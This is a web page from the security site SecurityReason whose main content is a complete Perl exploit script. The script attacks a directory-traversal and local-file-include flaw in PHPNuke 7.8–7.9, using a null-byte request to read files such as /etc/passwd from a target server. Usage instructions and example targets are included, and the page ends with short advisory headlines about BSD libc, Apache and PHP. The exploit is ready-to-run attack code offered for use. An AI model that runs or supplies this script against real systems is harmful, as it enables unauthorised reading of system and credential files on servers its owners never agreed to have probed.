|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityReason Exploit |
 Exploit Code : #!/usr/bin/perl use IO::Socket; # SecurityReason Exploit Code # by sp3x # sp3x@securityreason.com # www.securityreason.com # Remote Directory Traversal Exploit - Local file include # PHPNuke -> 7.8 full patched , 7.9 fullpatched + patch 3.1 # Server must have magic_quotes_gpc = Off - need to use %00 # Copyright © SecurityReason. All Rights Reserved. # # Example of usage : perl phpnuke-expl.pl 172.24.2.1 nukedir Search ../../../etc/passwd if (@ARGV < 3) { print "\r\n"; print "SecurityReason - www.securityreason.com\r\n"; print "[sp3x] EXPLOIT for PHPNuke 7.8 - 7.9\r\n"; print " \r\n"; print "perl phpnuke-expl.pl [Host] [nuke_dir] [file]\r\n\r\n"; print "[Host] - Host where is phpnuke example: http://localhost\r\n"; print "[nuke_dir] - Directory of PHPNuke example: /phpnuke/html/\r\n"; print "[module] - Module of PHPNuke example: News\r\n"; print "[file] - file to show - example : ../../../../../etc/passwd\r\n\r\n"; print "Example of usage : perl phpnuke-expl.pl 172.24.2.1 nukedir module ../../../../../etc/passwd"; print "\r\n"; exit(); } $HOST = $ARGV[0]; $DIR = $ARGV[1]."modules.php"; $MODULE = "?name=".$ARGV[2]."&"; $FILE = "file=".$ARGV[3]."%00"; $LENGTH = length $FILE; print "\r\n[Host] : ".$HOST."\n"; print "[Dir] : ".$DIR."\n"; print "[Module] : ".$ARGV[2]."\n"; print "[File] : ".$ARGV[3]."\r\n\r\n"; $HOST =~ s/(http:\/\/)//; $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80" ) || die "Error 404\r\n\r\n"; print $get1 "GET ".$DIR.$MODULE.$FILE." HTTP/1.0\n"; print $get1 "Host: ".$HOST."\n"; print $get1 "User-Agent: Mozilla/5.0 - SecurityReason"; print $get1 "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5"; print $get1 "Accept-Language: pl,en-us;q=0.7,en;q=0.3"; print $get1 "Accept-Encoding: gzip,deflate"; print $get1 "Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7"; print $get1 "Keep-Alive: 300"; print $get1 "Cookie: lang=english"; print $get1 "Cache-Control: max-age=0"; print $get1 "Content-Type: application/x-www-form-urlencoded\n"; print $get1 "Content-Length: ".$LENGTH."\n\n"; print $get1 $FILE; while ($odp = <$get1>) { if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) { printf "\n\nFile ".$ARGV[2]." doesn't exists or something goes wrong.\r\n\r\n"; exit; } printf $odp; } |
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache (mod_status) |
||
» Apache (mod_proxy_ftp) |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |